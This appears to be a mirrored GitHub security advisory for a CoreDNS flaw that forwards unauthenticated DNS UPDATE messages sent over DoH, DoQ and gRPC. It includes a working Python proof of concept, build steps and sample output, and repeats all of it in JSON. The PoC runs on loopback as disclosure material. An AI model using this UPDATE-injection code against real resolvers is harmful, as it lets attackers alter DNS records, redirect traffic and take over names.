GHSA-9GM5-9RFH-M6VX
Vulnerability from github – Published: 2026-09-17 20:33 – Updated: 2026-09-17 20:33Summary
CoreDNS accepted RFC 2136 UPDATE messages over DoH, DoH3, DoQ, and DNS-over-gRPC, then allowed the proxy/forward plugin to send them unchanged to an upstream DNS server. UDP, TCP, and DoT rejected the same opcode before plugin dispatch.
If an update-capable upstream trusts CoreDNS's source address or authenticated connection instead of requiring end-to-end TSIG, an unauthenticated client can use CoreDNS to add, replace, or delete DNS records.
Details
The affected listeners called dns.Msg.Unpack without the request policy used by the UDP/TCP server:
CoreDNS routed the message using its Zone question without checking the opcode. forward then passed the original message to the upstream.
By contrast, dns.DefaultMsgAcceptFunc allows only QUERY and NOTIFY. The fix applies that policy to the raw header via dnsutil.UnpackRequest before any affected transport dispatches the request.
PoC
The reproducer starts a standard-library synthetic DNS upstream on loopback, sends an unsigned UPDATE over DoH, and reports whether the upstream received the record. It supports both UDP and TCP because the forward plugin may select either transport. It does not contact or modify a real authoritative server.
Clone the repository and build the server:
git clone git@github.com:coredns/coredns.git
cd coredns
git checkout d5e54040ffab9a5c12c6de27b66f59f62b385195 # latest pre-fix commit from main
go build -tags=grpcnotrace -o coredns .
Save this as Corefile.poc:
https://.:8053 {
bind 127.0.0.1
tls plugin/tls/test_cert.pem plugin/tls/test_key.pem
forward . 127.0.0.1:15354
}
Save this as poc.py:
#!/usr/bin/env python3
import argparse
import http.client
import queue
import socket
import ssl
import struct
import threading
OPCODE_UPDATE = 5
TYPE_A = 1
CLASS_IN = 1
def encode_name(name):
return b"".join(bytes((len(label),)) + label.encode() for label in name.rstrip(".").split(".")) + b"\x00"
def update_message():
zone = encode_name("example.com.") + struct.pack("!HH", 6, CLASS_IN)
update = (
encode_name("foo.example.com.")
+ struct.pack("!HHIH", TYPE_A, CLASS_IN, 300, 4)
+ socket.inet_aton("192.0.2.123")
)
header = struct.pack("!HHHHHH", 0x1234, OPCODE_UPDATE << 11, 1, 0, 1, 0)
return header + zone + update
def read_name(message, offset):
labels = []
end = None
seen = set()
while True:
if offset >= len(message) or offset in seen:
raise ValueError("invalid DNS name")
seen.add(offset)
length = message[offset]
if length & 0xC0 == 0xC0:
if offset + 1 >= len(message):
raise ValueError("truncated compression pointer")
if end is None:
end = offset + 2
offset = ((length & 0x3F) << 8) | message[offset + 1]
continue
offset += 1
if length == 0:
return ".".join(labels) + ".", end if end is not None else offset
if length & 0xC0 or offset + length > len(message):
raise ValueError("invalid DNS label")
labels.append(message[offset : offset + length].decode("ascii"))
offset += length
def question_end(message, count):
offset = 12
for _ in range(count):
_, offset = read_name(message, offset)
offset += 4
if offset > len(message):
raise ValueError("truncated question")
return offset
def parse_update(message):
_, flags, qdcount, _, nscount, _ = struct.unpack_from("!HHHHHH", message)
if (flags >> 11) & 0xF != OPCODE_UPDATE or qdcount != 1 or nscount < 1:
return None
offset = question_end(message, qdcount)
name, offset = read_name(message, offset)
rrtype, rrclass, ttl, rdlength = struct.unpack_from("!HHIH", message, offset)
offset += 10
rdata = message[offset : offset + rdlength]
if rrtype != TYPE_A or rrclass != CLASS_IN or len(rdata) != 4:
return None
return name, ttl, socket.inet_ntoa(rdata)
def response_for(message):
ident, flags, qdcount, _, _, _ = struct.unpack_from("!HHHHHH", message)
end = question_end(message, qdcount)
response_flags = flags | 0x8000
return struct.pack("!HHHHHH", ident, response_flags, qdcount, 0, 0, 0) + message[12:end]
def handle_message(message, peer, received):
try:
update = parse_update(message)
response = response_for(message)
except (ValueError, struct.error):
return None
if update is not None:
received.put((peer, update))
return response
def serve_udp(sock, received, stopped):
while not stopped.is_set():
try:
message, peer = sock.recvfrom(65535)
except socket.timeout:
continue
except OSError:
return
response = handle_message(message, peer, received)
if response is not None:
sock.sendto(response, peer)
def recv_exact(connection, size, stopped):
data = bytearray()
while len(data) < size and not stopped.is_set():
try:
chunk = connection.recv(size - len(data))
except socket.timeout:
continue
if not chunk:
return None
data.extend(chunk)
return bytes(data) if len(data) == size else None
def serve_tcp(sock, received, stopped):
while not stopped.is_set():
try:
connection, peer = sock.accept()
except socket.timeout:
continue
except OSError:
return
with connection:
connection.settimeout(0.1)
while not stopped.is_set():
length = recv_exact(connection, 2, stopped)
if length is None:
break
message = recv_exact(connection, struct.unpack("!H", length)[0], stopped)
if message is None:
break
response = handle_message(message, peer, received)
if response is not None:
connection.sendall(struct.pack("!H", len(response)) + response)
def send_doh(host, port, payload, timeout):
context = ssl._create_unverified_context()
connection = http.client.HTTPSConnection(host, port, timeout=timeout, context=context)
try:
connection.request(
"POST",
"/dns-query",
body=payload,
headers={"Content-Type": "application/dns-message"},
)
response = connection.getresponse()
body = response.read()
return response.status, len(body)
finally:
connection.close()
def main():
parser = argparse.ArgumentParser(description="Probe whether CoreDNS forwards RFC 2136 UPDATE over DoH")
parser.add_argument("--host", default="127.0.0.1")
parser.add_argument("--port", type=int, default=8053)
parser.add_argument("--upstream-host", default="127.0.0.1")
parser.add_argument("--upstream-port", type=int, default=15354)
parser.add_argument("--timeout", type=float, default=2.0)
parser.add_argument("--expect", choices=("forwarded", "blocked", "either"), default="either")
args = parser.parse_args()
received = queue.Queue()
stopped = threading.Event()
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock.settimeout(0.1)
udp_sock.bind((args.upstream_host, args.upstream_port))
tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tcp_sock.settimeout(0.1)
tcp_sock.bind((args.upstream_host, args.upstream_port))
tcp_sock.listen()
threads = [
threading.Thread(target=serve_udp, args=(udp_sock, received, stopped), daemon=True),
threading.Thread(target=serve_tcp, args=(tcp_sock, received, stopped), daemon=True),
]
for thread in threads:
thread.start()
payload = update_message()
try:
status, response_bytes = send_doh(args.host, args.port, payload, args.timeout)
try:
peer, update = received.get(timeout=args.timeout)
except queue.Empty:
peer = update = None
finally:
stopped.set()
udp_sock.close()
tcp_sock.close()
for thread in threads:
thread.join(timeout=1)
print("payload=%d opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123" % len(payload))
print("http_status=%d response_bytes=%d" % (status, response_bytes))
if update is None:
result = "blocked"
print("upstream_received_update=false")
else:
result = "forwarded"
name, ttl, address = update
print("upstream_received_update=true source=%s:%d" % peer)
print("upstream_record=%s %d IN A %s" % (name, ttl, address))
print("result=%s" % result)
if args.expect != "either" and args.expect != result:
raise SystemExit("expected %s, got %s" % (args.expect, result))
if __name__ == "__main__":
main()
Start the vulnerable revision:
./coredns -conf Corefile.poc
In a second terminal, run the probe:
$ python3 poc.py --expect forwarded
payload=60 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123
http_status=200 response_bytes=29
upstream_received_update=true source=127.0.0.1:52391
upstream_record=foo.example.com. 300 IN A 192.0.2.123
result=forwarded
The ephemeral source port varies. The output confirms that the upstream saw the complete UPDATE as a request originating from CoreDNS.
For comparison, build and start CoreDNS with the fix:
git checkout 530b0a5ff2ad68cc0421f10dd93568945cc671c9 # fix commit from main
go build -tags=grpcnotrace -o coredns-fixed .
./coredns-fixed -conf Corefile.poc
The same probe is rejected before reaching the synthetic upstream:
$ python3 poc.py --expect blocked
payload=62 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123
http_status=400 response_bytes=16
upstream_received_update=false
result=blocked
Impact
Exploitation requires all of the following:
- an attacker can reach a CoreDNS DoH, DoH3, DoQ, or DNS-over-gRPC listener
- the selected
proxy/forwardtarget accepts RFC 2136 UPDATE - the upstream trusts CoreDNS's source address or connection and does not require an attacker-unknown TSIG
The upstream sees the UPDATE as originating from CoreDNS. A successful attack can redirect traffic, take over names, alter mail routing, or disrupt the writable zone. Requiring and validating end-to-end TSIG prevents the demonstrated attack.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.14.6"
},
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-86003"
],
"database_specific": {
"cwe_ids": [
"CWE-441"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-17T20:33:05Z",
"nvd_published_at": "2026-09-16T19:17:51Z",
"severity": "HIGH"
},
"details": "### Summary\n\nCoreDNS accepted [RFC 2136](https://datatracker.ietf.org/doc/html/rfc2136) UPDATE messages over DoH, DoH3, DoQ, and DNS-over-gRPC, then allowed the `proxy`/`forward` plugin to send them unchanged to an upstream DNS server. UDP, TCP, and DoT rejected the same opcode before plugin dispatch.\n\nIf an update-capable upstream trusts CoreDNS\u0027s source address or authenticated connection instead of requiring end-to-end TSIG, an unauthenticated client can use CoreDNS to add, replace, or delete DNS records.\n\n### Details\n\nThe affected listeners called `dns.Msg.Unpack` without the request policy used by the UDP/TCP server:\n\n- [DoH and DoH3](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/doh/doh.go#L134-L155)\n- [DoQ](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_quic.go#L212-L219)\n- [DNS-over-gRPC](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_grpc.go#L176-L184)\n\nCoreDNS routed the message using its Zone question without checking the opcode. [`forward`](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/forward/forward.go#L113-L118) then passed the original message to the [upstream](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/proxy/connect.go#L150-L167).\n\nBy contrast, [`dns.DefaultMsgAcceptFunc`](https://github.com/miekg/dns/blob/v1.1.72/acceptfunc.go#L33-L57) allows only QUERY and NOTIFY. The fix applies that policy to the raw header via [`dnsutil.UnpackRequest`](https://github.com/coredns/coredns/blob/530b0a5ff2ad68cc0421f10dd93568945cc671c9/plugin/pkg/dnsutil/message.go#L13-L23) before any affected transport dispatches the request.\n\n### PoC\n\nThe reproducer starts a standard-library synthetic DNS upstream on loopback, sends an unsigned UPDATE over DoH, and reports whether the upstream received the record. It supports both UDP and TCP because the `forward` plugin may select either transport. It does not contact or modify a real authoritative server.\n\nClone the repository and build the server:\n\n```bash\ngit clone git@github.com:coredns/coredns.git\ncd coredns\ngit checkout d5e54040ffab9a5c12c6de27b66f59f62b385195 # latest pre-fix commit from main\ngo build -tags=grpcnotrace -o coredns .\n```\n\nSave this as `Corefile.poc`:\n\n```text\nhttps://.:8053 {\n bind 127.0.0.1\n tls plugin/tls/test_cert.pem plugin/tls/test_key.pem\n forward . 127.0.0.1:15354\n}\n```\n\nSave this as `poc.py`:\n\n```python\n#!/usr/bin/env python3\nimport argparse\nimport http.client\nimport queue\nimport socket\nimport ssl\nimport struct\nimport threading\n\n\nOPCODE_UPDATE = 5\nTYPE_A = 1\nCLASS_IN = 1\n\n\ndef encode_name(name):\n return b\"\".join(bytes((len(label),)) + label.encode() for label in name.rstrip(\".\").split(\".\")) + b\"\\x00\"\n\n\ndef update_message():\n zone = encode_name(\"example.com.\") + struct.pack(\"!HH\", 6, CLASS_IN)\n update = (\n encode_name(\"foo.example.com.\")\n + struct.pack(\"!HHIH\", TYPE_A, CLASS_IN, 300, 4)\n + socket.inet_aton(\"192.0.2.123\")\n )\n header = struct.pack(\"!HHHHHH\", 0x1234, OPCODE_UPDATE \u003c\u003c 11, 1, 0, 1, 0)\n return header + zone + update\n\n\ndef read_name(message, offset):\n labels = []\n end = None\n seen = set()\n while True:\n if offset \u003e= len(message) or offset in seen:\n raise ValueError(\"invalid DNS name\")\n seen.add(offset)\n length = message[offset]\n if length \u0026 0xC0 == 0xC0:\n if offset + 1 \u003e= len(message):\n raise ValueError(\"truncated compression pointer\")\n if end is None:\n end = offset + 2\n offset = ((length \u0026 0x3F) \u003c\u003c 8) | message[offset + 1]\n continue\n offset += 1\n if length == 0:\n return \".\".join(labels) + \".\", end if end is not None else offset\n if length \u0026 0xC0 or offset + length \u003e len(message):\n raise ValueError(\"invalid DNS label\")\n labels.append(message[offset : offset + length].decode(\"ascii\"))\n offset += length\n\n\ndef question_end(message, count):\n offset = 12\n for _ in range(count):\n _, offset = read_name(message, offset)\n offset += 4\n if offset \u003e len(message):\n raise ValueError(\"truncated question\")\n return offset\n\n\ndef parse_update(message):\n _, flags, qdcount, _, nscount, _ = struct.unpack_from(\"!HHHHHH\", message)\n if (flags \u003e\u003e 11) \u0026 0xF != OPCODE_UPDATE or qdcount != 1 or nscount \u003c 1:\n return None\n offset = question_end(message, qdcount)\n name, offset = read_name(message, offset)\n rrtype, rrclass, ttl, rdlength = struct.unpack_from(\"!HHIH\", message, offset)\n offset += 10\n rdata = message[offset : offset + rdlength]\n if rrtype != TYPE_A or rrclass != CLASS_IN or len(rdata) != 4:\n return None\n return name, ttl, socket.inet_ntoa(rdata)\n\n\ndef response_for(message):\n ident, flags, qdcount, _, _, _ = struct.unpack_from(\"!HHHHHH\", message)\n end = question_end(message, qdcount)\n response_flags = flags | 0x8000\n return struct.pack(\"!HHHHHH\", ident, response_flags, qdcount, 0, 0, 0) + message[12:end]\n\n\ndef handle_message(message, peer, received):\n try:\n update = parse_update(message)\n response = response_for(message)\n except (ValueError, struct.error):\n return None\n if update is not None:\n received.put((peer, update))\n return response\n\n\ndef serve_udp(sock, received, stopped):\n while not stopped.is_set():\n try:\n message, peer = sock.recvfrom(65535)\n except socket.timeout:\n continue\n except OSError:\n return\n response = handle_message(message, peer, received)\n if response is not None:\n sock.sendto(response, peer)\n\n\ndef recv_exact(connection, size, stopped):\n data = bytearray()\n while len(data) \u003c size and not stopped.is_set():\n try:\n chunk = connection.recv(size - len(data))\n except socket.timeout:\n continue\n if not chunk:\n return None\n data.extend(chunk)\n return bytes(data) if len(data) == size else None\n\n\ndef serve_tcp(sock, received, stopped):\n while not stopped.is_set():\n try:\n connection, peer = sock.accept()\n except socket.timeout:\n continue\n except OSError:\n return\n with connection:\n connection.settimeout(0.1)\n while not stopped.is_set():\n length = recv_exact(connection, 2, stopped)\n if length is None:\n break\n message = recv_exact(connection, struct.unpack(\"!H\", length)[0], stopped)\n if message is None:\n break\n response = handle_message(message, peer, received)\n if response is not None:\n connection.sendall(struct.pack(\"!H\", len(response)) + response)\n\n\ndef send_doh(host, port, payload, timeout):\n context = ssl._create_unverified_context()\n connection = http.client.HTTPSConnection(host, port, timeout=timeout, context=context)\n try:\n connection.request(\n \"POST\",\n \"/dns-query\",\n body=payload,\n headers={\"Content-Type\": \"application/dns-message\"},\n )\n response = connection.getresponse()\n body = response.read()\n return response.status, len(body)\n finally:\n connection.close()\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Probe whether CoreDNS forwards RFC 2136 UPDATE over DoH\")\n parser.add_argument(\"--host\", default=\"127.0.0.1\")\n parser.add_argument(\"--port\", type=int, default=8053)\n parser.add_argument(\"--upstream-host\", default=\"127.0.0.1\")\n parser.add_argument(\"--upstream-port\", type=int, default=15354)\n parser.add_argument(\"--timeout\", type=float, default=2.0)\n parser.add_argument(\"--expect\", choices=(\"forwarded\", \"blocked\", \"either\"), default=\"either\")\n args = parser.parse_args()\n\n received = queue.Queue()\n stopped = threading.Event()\n udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n udp_sock.settimeout(0.1)\n udp_sock.bind((args.upstream_host, args.upstream_port))\n tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n tcp_sock.settimeout(0.1)\n tcp_sock.bind((args.upstream_host, args.upstream_port))\n tcp_sock.listen()\n threads = [\n threading.Thread(target=serve_udp, args=(udp_sock, received, stopped), daemon=True),\n threading.Thread(target=serve_tcp, args=(tcp_sock, received, stopped), daemon=True),\n ]\n for thread in threads:\n thread.start()\n\n payload = update_message()\n try:\n status, response_bytes = send_doh(args.host, args.port, payload, args.timeout)\n try:\n peer, update = received.get(timeout=args.timeout)\n except queue.Empty:\n peer = update = None\n finally:\n stopped.set()\n udp_sock.close()\n tcp_sock.close()\n for thread in threads:\n thread.join(timeout=1)\n\n print(\"payload=%d opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123\" % len(payload))\n print(\"http_status=%d response_bytes=%d\" % (status, response_bytes))\n if update is None:\n result = \"blocked\"\n print(\"upstream_received_update=false\")\n else:\n result = \"forwarded\"\n name, ttl, address = update\n print(\"upstream_received_update=true source=%s:%d\" % peer)\n print(\"upstream_record=%s %d IN A %s\" % (name, ttl, address))\n print(\"result=%s\" % result)\n\n if args.expect != \"either\" and args.expect != result:\n raise SystemExit(\"expected %s, got %s\" % (args.expect, result))\n\n\nif __name__ == \"__main__\":\n main()\n```\n\nStart the vulnerable revision:\n\n```sh\n./coredns -conf Corefile.poc\n```\n\nIn a second terminal, run the probe:\n\n```console\n$ python3 poc.py --expect forwarded\npayload=60 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123\nhttp_status=200 response_bytes=29\nupstream_received_update=true source=127.0.0.1:52391\nupstream_record=foo.example.com. 300 IN A 192.0.2.123\nresult=forwarded\n```\n\nThe ephemeral source port varies. The output confirms that the upstream saw the complete UPDATE as a request originating from CoreDNS.\n\nFor comparison, build and start CoreDNS with the fix:\n\n```sh\ngit checkout 530b0a5ff2ad68cc0421f10dd93568945cc671c9 # fix commit from main\ngo build -tags=grpcnotrace -o coredns-fixed .\n./coredns-fixed -conf Corefile.poc\n```\n\nThe same probe is rejected before reaching the synthetic upstream:\n\n```console\n$ python3 poc.py --expect blocked\npayload=62 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123\nhttp_status=400 response_bytes=16\nupstream_received_update=false\nresult=blocked\n```\n\n### Impact\n\nExploitation requires all of the following:\n\n- an attacker can reach a CoreDNS DoH, DoH3, DoQ, or DNS-over-gRPC listener\n- the selected `proxy`/`forward` target accepts RFC 2136 UPDATE\n- the upstream trusts CoreDNS\u0027s source address or connection and does not require an attacker-unknown TSIG\n\nThe upstream sees the UPDATE as originating from CoreDNS. A successful attack can redirect traffic, take over names, alter mail routing, or disrupt the writable zone. Requiring and validating end-to-end TSIG prevents the demonstrated attack.",
"id": "GHSA-9gm5-9rfh-m6vx",
"modified": "2026-09-17T20:33:06Z",
"published": "2026-09-17T20:33:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-9gm5-9rfh-m6vx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-86003"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/commit/530b0a5ff2ad68cc0421f10dd93568945cc671c9"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "CoreDNS DoH/DoQ/gRPC bypass UPDATE rejection enforced on UDP/TCP"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
The approach is described in our paper Mapping CVEs to MITRE ATT&CK Techniques: A Curated Gold-Set Classifier and the Limits of LLM-Assisted Label Expansion.
Browse all ATT&CK techniques and the vulnerabilities related to each.
Related by attack behaviour
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